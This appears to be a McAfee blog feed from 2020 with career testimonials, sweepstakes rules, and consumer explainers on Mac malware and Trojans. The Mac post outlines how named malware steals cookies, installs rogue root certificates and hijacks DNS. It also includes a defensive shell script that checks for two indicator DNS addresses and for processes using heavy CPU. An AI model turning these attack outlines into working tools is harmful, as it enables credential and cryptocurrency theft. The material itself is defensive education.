Thinking Twice About Smartphones for Kids

Just as you want to monitor where your child is and what they’re doing out in the neighborhood, the same holds true for the internet. That’s as good a reason as any to put some serious thought into it before you put a smartphone in your child’s hands. As we’ve seen, the good news is that you don’t need a smartphone to keep in touch with your child. Yet more reassuring is that mobile carriers and technology companies are paying attention to the concerns that parents have and creating products that address them. Research your options and be sure to share what you find with other parents. You may start something special in your circle of friends.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

Women in Sales Part 2: Skilling up for a Career in Cybersecurity Sales https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/women-in-sales-part-2-skilling-up-for-a-career-in-cybersecurity-sales/ Thu, 30 Jul 2020 21:24:16 +0000


McAfee fosters an inclusive environment where we value varied life experiences. To showcase women who are making an impact and inspire others, we launched our Women in Sales Series.

In Part 1, McAfee women described industry opportunities and how they continue to break boundaries to develop rewarding careers.

Here in Part 2, we introduce women whose unique past experiences helped shape their career paths. They share critical skills for success and words of encouragement for those considering a career in sales. 


Practice clear communication and collaboration: “In a sales role, you constantly communicate with customers to help them achieve their desired outcomes with evolving solutions. We need people who can maintain relationships while demonstrating their relevance to stakeholders, C-level and highly technical engineer roles. My more successful peers are those who can navigate through various layers of organizational complexity because they know it takes dedication and expertise from everyone on the team to close deals. Keeping team members informed and constantly collaborating is critical throughout every step of the sales process.”

— Amy, Enterprise Sales, Charlotte, North Carolina

Be confident and take the leap: “My experience started in IT after I graduated from college. Later, I joined technical support at McAfee and was asked if I was interested in a sales engineering role. I didn’t have the experience but was excited to try something new and made the decision to leap into a sales career. My experience in technical support helped me get up to speed in sales engineering, and I love it.”

— Carine, Presales/Sales Engineering, Plano, Texas 


Build relationships and know the business: “If you’re focused and determined, you can succeed in sales. The most challenging part for me was picking up the sales piece as I already had a technical background. If you want to get into presales, half is relating to people and building strong relationships with the customer. The other half is engineering, and here, you need to learn enough of everything to hold knowledgeable conversations. Investigating resources quickly to source answers for the customer is also important. Be confident in yourself and your abilities.”

— Elizabeth, Presales/Sales Engineering, Plano, Texas 

Find your passion, then network: “I’ve found a degree in psychology handy in a sales career. It is easier for me to engage with people, read a situation and build rapport. With some experience, I saw a future in sales and carved out my career path. I thought the life of a field sales rep was exciting: greater earnings, more flexibility and so on. Once I knew I had found my path, I looked for opportunities to network with sales executives, get exposure and learn from them. Networking enabled me to build a name for myself and a personal brand.”

— Kate, Enterprise Sales – Federal, Washington, DC 

 

Leverage your transferable skills: “I previously worked in real estate designing high rise office buildings. I eventually wanted to try a different field. My presentation and project management skills were transferable, so I changed industries to telecom and began as a technical trainer. I eventually moved into a sales engineering role here at McAfee and am currently in a sales architect role.” 

— Melissa, Presales/Sales Engineering, Plano, Texas 

Understand the customer’s needs: “Sales is about cultivating relationships, understanding the customers’ needs and finding the best solution for them. These are the essential skills when considering a career in sales. You’ll never know if you can be successful if you don’t attempt it.”

— Marta, Inside Sales, Cork, Ireland 



Build a social platform and know when to speak up: “Look at your collective skillset and see how you can leverage it for sales. Be sure to showcase it on your resume and social channels like LinkedIn. Then network, network, network. Have a few good mentors in your corner who can make some connections for you internally and externally. But remember, you are responsible for your career: you must speak up and make sure your career goals and desired career path are known by leadership.”

— Paige, Sales Operations, Plano, Texas 


Spend time on people: “When I first began my career in sales operations, it helped me immensely to try and understand others’ points of view. You cannot find success in a vacuum and people are complex. My advice is to take time to understand people. Then, with dedication and hard work, the value you add will show through.”

— Preet, Sales Operations, Plano, Texas



Speak the language: “Presales is a bridge that links the technical to the sale, which means you need to understand two languages: technical and business. It is challenging, but also very exciting. For those looking to enter the industry, I recommend you leverage social media and connect with people to tap into their wisdom. This is how I found my current position.”

— Sandra, Presales/Sales Engineering, Sydney, Australia


Understand your team and global partners: “Go for it! The sales industry is unlike any other. A sales role offers an opportunity for anyone with a willingness to put in the work. In my position, there are two key indicators for success: understanding what motivates my team and navigating the nuances of interacting with diverse, global partners.”

— Sophie, Sales Project Management, Cork, Ireland 


It takes not only the range of talent these women bring to the table, but also passion, motivation and courage to thrive. 
Next week, meet more McAfee women in sales who will provide their perspectives on traits needed for a successful career in cybersecurity sales.  

Interested in joining a company that supports inclusion and belonging? Search our jobs. Subscribe to job alerts.

What is a McAfee Internship Like? 10 Interns Share Perspectives https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/what-is-a-mcafee-internship-like-10-interns-share-perspectives/ Thu, 30 Jul 2020 15:55:42 +0000


At McAfee, we foster meaningful internship experiences within our fast-paced world of cybersecurity. We know it’s the next generation that will build tomorrow’s technology solutions. McAfee interns make substantial contributions and are valued as global team members, joining our mission to protect all that matters.

This year, McAfee took the intern experience virtual due to the global pandemic. While not our typical experience, this year’s interns continue to thrive. To celebrate National Intern Day, we asked our interns around the world to share insights gained from their experiences.

“My new colleagues and leaders have helped me transition from college life to my full-time internship at McAfee. The people I work with put the customer at the core and are driven to provide the best quality security software. Since day one, I’ve always felt part of the McAfee family.”

Aaron, QA Engineering and Software Development Intern, Cork

 

“I was interested in McAfee because of the culture. I wanted to work at a place where I was treated well. Everyone is willing to step in and help you get back on the right track. I’ve had to adapt to an online internship environment, but I’m being equipped well to learn and do my work, and I’m really grateful to still have this opportunity.”

Benaisha, Finance Intern, Plano

 

“I was interested in interning a second year at McAfee because of the company’s values and workplace practices. I also enjoyed working in a positive and constructive atmosphere—it’s important to work for a company that wants to help you grow. I’ve been able to collaborate and work with people from all over the globe and increase my communication skills. My biggest takeaway is to never limit yourself and always be open-minded in your career field. Today, I’m confident in my capabilities because of the exposure McAfee has given me.”

Blair, People Success Intern, Plano


“The current times have made me appreciate how important communication and great teamwork truly are. My colleagues have been excellent mentors and are always available when I have questions. During my time at McAfee, I have taken on the responsibility of QA Lead on a project and have become involved with employee resource groups, including the Women in Security (WISE) Community and Cork Culture Club.”

Deirdre, QA Engineering and Software Development Intern, Cork


“McAfee provided a platform where I truly feel engaged by various aspects of technology. Most importantly, my work involving foundations for security and data exchange layer has enhanced the quality of my programming. I am now more comfortable with the organizational structure, seeking appropriate information and obtaining specific knowledge for responsible project ownership. I am greatly inspired by the vast, positive response by my team in creating an overall environment which fosters growth and career development.”

Divya, Technical Intern, Bangalore


“When I visited the Córdoba site on a college trip, I liked what my eyes saw: a very comfortable workplace environment to grow professionally. I viewed this internship as an opportunity to gain experience and knowledge alongside the best professionals in the field. I am learning new technologies, new work approaches, interacting with other professionals and working together as a team, as well as improving my English and living the McAfee Values.”

Emiliano, Undergraduate Technical Intern, Córdoba


“I’m learning how the cloud computing industry is actively changing our world. My McAfee team has helped broaden my understanding of computer networking/provisioning, building on what I’ve learned at my university and filling in the gaps. This experience has been incredible because we are constantly learning new technologies as a team. Thank you, McAfee, for continuing your internship program during the pandemic.”

Francisco, DevOps Engineer Intern, Santa Clara

 

 “I wanted to learn more about the ever-evolving cybersecurity world, which is applicable to any and every field or industry. This internship has allowed me to gain knowledge about the private sector while also fulfilling my interest in law. I’ve learned attention to detail and how the ability to effectively negotiate is essential. All the contracts and agreements that are processed through our team are highly important to the business. This is the most impactful and meaningful internship I’ve had in my entire college career. McAfee’s culture is inclusive — and even though I’m an undergraduate intern who is here for a short time, I really feel part of the team.” 

Gia, Public Sector Legal Intern, Reston

 

“McAfee became one of the top companies on my list during my time in an internship program at school as I learned about our products and mission. I wanted to learn more about cybersecurity and to expand my horizons. I have the opportunity to help maintain and improve the system of testing environments for engineers across McAfee. The people I work with regularly provide feedback, guidance and are extremely helpful. McAfee is truly a great place to work, to learn, and more importantly, it’s filled with amazing and talented individuals. I’m extremely grateful for the opportunity and thankful to have this incredible experience.”

Jeff, Software Development Engineering Intern, Hillsboro


“I’m gaining skills and experiences I cannot learn in school. While working on different projects, I’ve been able to familiarize myself with existing UI patterns, work with product managers and engineers to gauge the feasibility of my solutions, receive feedback, iterate on my designs and learn from an amazing community of people.”
  

Katie, UX Design Intern, Santa Clara


Follow @LifeAtMcAfee on Instagram and @McAfee on Twitter to see what working at McAfee is all about. Interested in a new career opportunity at McAfee? Explore our careers.

Security is a Feeling- With the McAfee #SecureMyLife RT2Win Sweepstakes! https://www.mcafee.com/blogs/consumer/security-is-a-feeling-with-the-mcafee-securemylife-rt2win-sweepstakes/ Thu, 30 Jul 2020 15:55:11 +0000
Security is a Feeling - Share it with the McAfee #SecureMyLife RT2Win Sweepstakes!

The word ‘security’ means something unique to everyone. Security is a feeling, an emotion, a sense of belonging and place: It could be the feeling of cuddling as a family in a pillow fort, making sure your house is locked at night, or always having a smartphone in your pocket for directions or an emergency.

Though our digital devices are convenient, they can also be cause for possible security concerns due to overlooked weaknesses. Check out the latest research from the McAfee team for more information.

While all this dazzling technology has its appeal, we here at McAfee understand the importance of creating new security solutions for those who want to live their connected lives with confidence.

In fact, to celebrate the latest innovations, we’re giving two [2] lucky people the chance to win an Amazon gift card. Not a customer? Not a problem!  Simply retweet one of our contest tweets with the required hashtag between August 3rd, 2020 – August 16th 2020 for your chance to win. Follow the instructions below to enter, and good luck!

#RT2Win Sweepstakes Official Rules

  • To enter, go to https://twitter.com/McAfee_Home, and find the #RT2Win sweepstakes tweet.
  • Four [4] sweepstakes tweets will be released on the following schedule, each including the hashtags #RT2Win #Sweepstakes AND #SecureMyLife:
    • Monday, August 3, 2020 at 9:05AM PST
    • Thursday, August 6, 2020 at 9:05AM PST
    • Monday, August 10, 2020 at 9:05AM PST
    • Thursday, August 13, 2020 at 9:05AM PST
  • Retweet the sweepstakes tweet released on the above date before 11:59PM PST, from your own handle. The #RT2Win, #Sweepstakes AND #SecureMyLife hashtags must be included to be entered.
  • Sweepstakes will end on Monday August 16, 2020 at 11:59pm PT. All entries must be made before that date and time.
  • Winners will be notified on Wednesday August 19, 2020 via Twitter direct message.
  • Limit one entry per person.

1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#RT2Win, #Sweepstakes, and #SecureMyLife” for a chance at an Amazon Gift card. Two [2] winners will be selected by 10:00 AM PT August 19, 2020, for a total of two [2] winners. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

McAfee #SecureMyLife RT2Win Sweepstakes Terms and Conditions

2. How to Enter:

No purchase necessary. A purchase will not increase your chances of winning. McAfee’s #RT2Win Sweepstakes will be conducted from August 3rd through August 16th. All entries for each day of the #SecureMyLife RT2Win Sweepstakes must be received during the time allotted for the #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee RT2Win Sweepstakes. The #SecureMyLife RT2Win Sweepstakes duration is as follows:

#RT2Win Sweepstakes:

  • Begins: Monday, August 3rd, 2020 at 7:00am PST
  • Ends: Sunday, August 16, 2020 at 11:59 PST
    • Opportunity 1: Monday, August 3, 2020 at 9:05AM PST
    • Opportunity 2: Thursday, August 6, 2020 at 9:05AM PST
    • Opportunity 3: Monday, August 10, 2020 at 9:05AM PST
    • Opportunity 4: Thursday, August 13, 2020 at 9:05AM PST
  • Winners will be announced: by 10:00AM PST August 19, 2020

For the #SecureMyLife RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the #SecureMyLife RT2Win Sweepstakes:

  1. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #SecureMyLife, #RT2Win and #Sweepstakes.
  2. Retweet the sweepstakes tweet of the day and make sure it includes the #McAfee, #SecureMyLife, #RT2Win and #Sweepstakes hashtags.
    1. Note: Tweets that do not contain the #SecureMyLife, #RT2Win and #Sweepstakes hashtags will not be considered for entry.
  3. Limit one entry per person. 

Two (2) winners will be chosen for the #McAfee #SecureMyLife Sweepstakes tweet from the viable pool of entries that retweeted and included #. McAfee and the McAfee social team will select winners at random from among the viable entries. The winners will be announced and privately messaged on August 19, 2020 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. SWEEPSTAKES IS IN NO WAY SPONSORED, ENDORSED, ADMINISTERED BY, OR ASSOCIATED WITH TWITTER, INC. 

3. Eligibility:

McAfee’s #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the date the #SecureMyLife RT2Win Sweepstakes begins and live in a jurisdiction where this prize and the #SecureMyLife RT2Win Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

     4. Winner Selection:

Winners will be selected from the eligible entries received during the #SecureMyLife RT2Win Sweepstakes periods. Sponsor will select the names of two [2] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official #SecureMyLife RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

     5. Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com by August 19, 2020. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

     6. Prizes: 

The prizes for the #SecureMyLife RT2Win Sweepstakes are two [2] $100 Amazon e-gift cards (approximate retail value “ARV” of the prize is $100 USD; the total ARV of all gift cards is $200 USD). Entrants agree that Sponsor has the sole right to determine the winners of the #SecureMyLife RT2Win Sweepstakes and all matters or disputes arising from the #SecureMyLife RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

      7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the #SecureMyLife RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the #SecureMyLife RT2Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the #SecureMyLife RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any #SecureMyLife RT2Win Sweepstakes-related activity, or participation in the #SecureMyLife RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

If participating in this Sweepstakes via your mobile device (which service may only be available via select devices and participating wireless carriers and is not required to enter), you may be charged for standard data use from your mobile device according to the terms in your wireless service provider’s data plan.  Normal airtime and carrier charges and other charges may apply to data use and will be billed on your wireless device bill or deducted from your pre-paid balance.  Wireless carrier rates vary, so you should contact your wireless carrier for information on your specific data plan.

      8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.

     2. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list). As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation.

         By entering this  sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

      9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these #SecureMyLife RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each #SecureMyLife RT2Win Sweepstakes.

     10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the #SecureMyLife RT2Win Sweepstakes and all matters or disputes arising from the #SecureMyLife RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

     11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of New York.

     12. Privacy Notice: 

Personal information obtained in connection with this #SecureMyLife RT2Win Sweepstakes will be handled in accordance with the policy set forth at http://www.mcafee.com/us/about/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after January 10th 2020 and before August 16th 2021 to the address listed below, Attn: #RT2Win Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Consumer Content Marketing. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA

The post Security is a Feeling- With the McAfee #SecureMyLife RT2Win Sweepstakes! appeared first on McAfee Blogs.

Can Macs get Viruses? https://www.mcafee.com/blogs/consumer/can-macs-get-viruses/ https://www.mcafee.com/blogs/consumer/can-macs-get-viruses/#respond Thu, 30 Jul 2020 15:21:19 +0000 /blogs/?p=104043

The post Can Macs get Viruses? appeared first on McAfee Blogs.


Can Macs get viruses?

In addition to working seamlessly with other Apple devices, many users prefer Macs because of their perceived “inherent” security. Apple pushes periodic updates so that each generation of its products runs the most secure software version available, and macOS makes it hard to run software that does not come from the App Store or an identified developer. None of that makes a Mac immune to malware.

What is a virus?

Strictly, a virus is malicious code that inserts itself into other programs or files and copies itself, spreading to other systems. In everyday use the word covers malware more broadly: anything that can steal personal or financial information, corrupt files, or hijack your CPU to mine cryptocurrency (cryptojacking). Here are some of the malware families that have infected Macs, and some of the best ways to protect your computer from them.

CookieMiner

CookieMiner is malware that steals browser authentication cookies, primarily those associated with cryptocurrency exchanges. By replaying a stolen session cookie together with saved usernames and passwords, the attacker can sidestep the login and multi-factor checks that both Apple and the exchanges put in place. It also pulls data out of iTunes backups stored on the Mac (including text messages, which can carry the one-time codes used to open cryptocurrency wallets), letting the attacker drain Bitcoin, Ethereum, XRP and other holdings. Stealing cryptocurrency isn’t enough for the CookieMiner operators: the malware also loads mining software onto the Mac to mine Koto, a little-known Japanese cryptocurrency.

Besides a lighter cryptocurrency wallet, there are other clues that a Mac is infected with CookieMiner. The miner consumes a large share of CPU time, so an infected Mac becomes slow at even basic tasks, other applications stall or stop working, and the machine may overheat.

OSX/Dok… Next Generation

OSX/Dok is malware that silently routes all of a Mac’s web traffic through an attacker-controlled proxy. It gets past Gatekeeper because it is signed with a legitimate Apple developer certificate, and it installs its own root certificate on the machine, so the attacker can decrypt and read traffic that would otherwise be protected by TLS, including online banking sessions. This is especially troubling since iPhones, iPads and MacBooks are commonly synced to work together.

Apple revoked the developer certificate used by the original OSX/Dok, but later versions appeared signed with different certificates. The malware usually arrives as an attachment in a phishing email. Once run, it displays a message claiming the system has detected a security issue and prompts the user to install an “update”, locking the screen until an administrator password is entered. With that password the malware has full administrative privileges to install its proxy settings and root certificate.

Crossrider

Crossrider is adware delivered by a variant of the OSX/Shlayer dropper, which uses a fake Adobe Flash Player installer to drop other malicious components onto a Mac. Users are shown a message that Flash Player needs updating; following the link downloads the fake installer instead of the real update from Adobe’s website. The fake installer then asks for your password so that it can “make changes to your system” and install the program.

Advanced Mac Cleaner, the Chumsearch Safari extension and MyShopCoupon+ are some of the items installed by the fake Flash Player installer. MyShopCoupon+ and Chumsearch are mostly an annoyance, but Advanced Mac Cleaner can cost you real money: it pretends to run a security scan, reports several “issues”, and then asks for $107 to activate its clean-up feature.

Macros Viruses… From Microsoft Word

Macro viruses used to be a problem only PC users faced. Macros are pieces of code embedded in documents to automate routine tasks; in Microsoft Office they are written in Visual Basic for Applications (VBA) and run inside Word, Excel and other Office applications. Malicious macros can delete or corrupt files, download further malware, or run arbitrary commands. A classic Word macro virus copies itself into the global template when you open an infected document, and from there into every document you subsequently create or save.

Microsoft removed VBA support from Office 2008 for Mac but restored it in Office 2011 and later versions of Word and Excel. Mac users still have some protection: Office for Mac does not enable macros by default, so a document’s macro code does not run until you explicitly allow it. Treat any prompt to enable macros in a document you did not expect as a warning sign.

MShelper

MShelper is cryptocurrency-mining malware that lets an attacker help himself to your computer’s processing power to mine coins for his own wallet. The same malware is also used to push advertisements into browsers such as Chrome and Firefox. Researchers believe MShelper spreads through downloads of dubious origin. Signs of infection include shorter battery life, fans spinning at full speed, overheating and increased noise.

Because mining takes a great deal of CPU power, MShelper is not hard to spot. Open Activity Monitor, select the CPU tab and sort by % CPU: an infected Mac will show a process named mshelper at the top of the list with extremely high CPU usage.

OSX/MaMi

OSX/MaMi is malware that lets attackers intercept sensitive information by redirecting a Mac’s traffic through servers they control. It does this by changing the DNS server settings on the Mac to attacker-controlled addresses, so the attacker decides which IP address each domain name resolves to, and by installing a root certificate so that intercepted HTTPS connections do not raise warnings. It can also steal login credentials, upload and download files, and spy on your internet traffic.

OSX/MaMi had very low antivirus detection rates when it first appeared, but researchers said it had not been used to target Mac users on a widespread basis; victims encountered it through targeted phishing emails. The clearest sign of infection is a change in DNS settings: a Mac infected with this malware typically shows the two addresses 82.163.143.135 and 82.163.142.137 as its DNS servers (System Preferences > Network > Advanced > DNS).
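Both symptoms above (a process hogging the CPU, as with MShelper, and DNS servers silently changed, as with OSX/MaMi) can be checked from a terminal. The script below is an added example, not code from the original post or from McAfee: each function reads the output of a standard macOS command from stdin, so it can be tried on saved output on any system, and the `live` mode runs the real commands on a Mac. The two DNS addresses are the ones quoted in the text; the 80% CPU threshold and the script name are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): two quick indicator checks.
#   check_dns_resolvers  - flags resolvers matching the OSX/MaMi addresses
#   check_cpu_hogs       - flags processes above a CPU threshold (miner symptom)
# Both read command output from stdin so they can be tested on saved output.

MAMI_DNS_IOCS="82.163.143.135 82.163.142.137"   # addresses quoted in the text
CPU_THRESHOLD=80                                # percent; assumed value, tune it

# Reads 'scutil --dns' output on stdin. Prints every resolver that matches an
# indicator. Returns 0 if none matched, 1 if at least one did.
check_dns_resolvers() {
    found=0
    # scutil lines look like:  "  nameserver[0] : 82.163.143.135"
    for ip in $(sed -n 's/.*nameserver\[[0-9]*\][[:space:]]*:[[:space:]]*\([0-9.]*\).*/\1/p'); do
        for bad in $MAMI_DNS_IOCS; do
            if [ "$ip" = "$bad" ]; then
                echo "SUSPECT resolver $ip matches an OSX/MaMi indicator"
                found=1
            fi
        done
    done
    return $found
}

# Reads 'ps -Axo %cpu,comm' output on stdin (header line first). Prints every
# process at or above CPU_THRESHOLD. Returns 0 if none, 1 if at least one.
check_cpu_hogs() {
    found=0
    while read -r cpu comm; do
        case "$cpu" in
            %CPU|'') continue ;;        # skip the header and blank lines
        esac
        whole=${cpu%%.*}               # integer part is enough to compare
        if [ "$whole" -ge "$CPU_THRESHOLD" ]; then
            echo "HIGH CPU ${cpu}% : $comm"
            found=1
        fi
    done
    return $found
}

# Live run on a Mac (script name is an assumption):  sh mac_ioc_check.sh live
if [ "${1:-}" = "live" ]; then
    scutil --dns | check_dns_resolvers
    ps -Axo %cpu,comm | check_cpu_hogs
fi
```

A non-zero exit from either function is the signal; the printed lines tell you which resolver or process to look at. A clean resolver list does not prove the machine is clean, since later DNS hijackers may use other addresses, but a match on these two is a strong indicator.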

Tips for Safeguarding Macs Against Malware

While Apple does a great deal to guard Macs against common threats, it can’t stop every determined attacker who sees its devices as a challenge.

Here are some top tips for shoring up security for your Mac:

  • Avoid opening spam emails and their attachments.
  • Don’t download files of questionable origin, and never type your password into an installer you didn’t go looking for.
  • Install an ad-blocking extension.
  • Create frequent system backups (Time Machine).
  • Install the latest OS and application updates.
  • Keep track of what sensitive data lives on the machine and who can access it.
  • Install a security suite (antivirus, firewall, browser destination monitoring).
  • Use VPN software when connected to public or untrusted networks.

Stay protected

Subscribing to a comprehensive security suite service is one of the most effective steps that you can take to safeguard your Apple devices, financial information, and privacy while online. McAfee partners with industry, IT experts, and the user community to deliver the most powerful cybersecurity solutions on the market.

Check more information about our latest security products.
Understanding Trojan Viruses and How to Get Rid of Them https://www.mcafee.com/blogs/consumer/understanding-trojan-viruses-and-how-to-get-rid-of-them/ https://www.mcafee.com/blogs/consumer/understanding-trojan-viruses-and-how-to-get-rid-of-them/#respond Thu, 30 Jul 2020 15:20:59 +0000 /blogs/?p=104031

The post Understanding Trojan Viruses and How to Get Rid of Them appeared first on McAfee Blogs.

Understanding Trojan Viruses and How to Get Rid of Them

Basic online scenario—You log onto your computer and notice that something’s just not right, but you can’t quite put your finger on it. Something just seems…a bit off. If you’ve found yourself in this situation, or even thinking you are, there’s a real possibility you could have a Trojan virus on your computer.

Trojan viruses can not only steal your most personal information, they also put you at risk for identity theft and other serious cybercrimes. In this post, we’ll examine what Trojan viruses are, and where they come from. We’ll also cover how you can protect yourself and get rid of viruses so you can stay safe and maintain peace of mind online.

What Trojan Viruses Do

Trojans are a type of malware that gets onto your computer disguised as a real, useful program. Strictly speaking a Trojan is not a virus, since it doesn’t copy itself; it relies on you to run it. Once inside, some Trojans sit idle and wait for instructions from the attacker’s command-and-control server, while others begin their malicious activity right away.

Some Trojans download additional malware and then weaken your security settings, while others actively try to disable your antivirus software. Some turn your computer into a bot in a criminal DDoS (Distributed Denial of Service) network.

How to Remove a Trojan Virus

Before looking at all the places a Trojan can come from, let’s first cover how to get rid of one. You can remove some Trojans by disabling startup items that don’t come from trusted sources. For the best results, first reboot into safe mode so that the malware is not running and can’t stop you from removing it.

Make sure you know which programs you’re removing: removing components your computer needs to function can slow, disable or cripple your system. Installing and using a trusted antivirus solution is also one of the best ways to get rid of Trojans. An effective antivirus program combines signature matching for known Trojans with checks on code signing and application behaviour, so that it can detect, isolate and promptly remove them. In addition to spotting known Trojans, the McAfee antivirus program can identify new ones by detecting suspicious activity inside your applications.

Where Trojan Viruses Come From

This section takes a closer look at the places where you are most vulnerable to a Trojan. Trojans look like normal programs, so they need a way to get your attention before you unknowingly install them. What sets them apart from most other malware is that they trick you into installing them yourself: you think you are downloading a game or a music file, and the file may even work as expected so that you never suspect it, while in the background it installs the malicious payload. Be careful with files from the following sources. Many users install Trojans from file-sharing websites and fake email attachments; spoofed chat messages, infected websites and hacked networks are other common routes.

File-Sharing Sites

Almost everyone who is a little tech savvy occasionally uses file-sharing websites. These include torrent sites and other sites that let users share files, and the appeal is obvious: people can get premium software without paying the retail price. The problem is that file-sharing sites are also extremely attractive to attackers who want an easy way into your system.

For example, an attacker uploads a cracked copy of a popular program to a torrent site as a free download and waits for victims to grab it; the cracked software carries a hidden Trojan that gives the attacker control of your computer.

Trojans also come disguised as music files, games and numerous other applications.

Email Attachments

Fake email attachments are another common way people end up with Trojans. An attacker sends you an email with an attachment, hoping you’ll click on it, so that you’re infected the moment you open it. Many attackers send generic emails to as many people as possible; others go after specific people or businesses they have targeted.

In targeted cases, the attacker sends an email that looks as if it came from someone you know. It might contain a Word document or something else you consider “safe”, but opening the attachment is what infects your computer. The easiest protection is to call the sender, before opening the attachment, to confirm they actually sent it.

Spoofed Messages

Countless popular programs and useful applications let you chat with others from your desktop. Whether you use such software for business or personal connections, you are at risk of Trojan infection unless you know how to protect yourself.

Attackers “spoof” a message so that it looks like it came from someone you trust. In addition to spoofing, they also register similar-looking usernames and hope you don’t notice the slight differences. As with fake emails, the attacker is sending you a Trojan-infected file or application.

Infected Websites

Many attackers target websites instead of individual users. They find weaknesses in poorly secured sites that let them upload files or, in some cases, take over the entire site. Once a site is hijacked, the attacker can use it to redirect you elsewhere.

With control of the site, the attacker can redirect your downloads to a malicious server that serves the Trojan in place of the genuine file. Sticking to trusted, well-known websites reduces your odds of falling into that trap, and a good antivirus program can also help detect infected and hacked sites.

Hacked Wi-Fi Networks

Hacked Wi-Fi networks are also a common source of Trojans and other malware. An attacker can set up a fake “hotspot” that looks exactly like the one you’re trying to connect to. If you connect to it by mistake, the attacker sits between you and the internet and can redirect you to fake websites that look so real that even experts have trouble spotting the difference, or swap the file you’re downloading for a Trojanized copy. Connections protected by HTTPS or a VPN are much harder to tamper with this way.
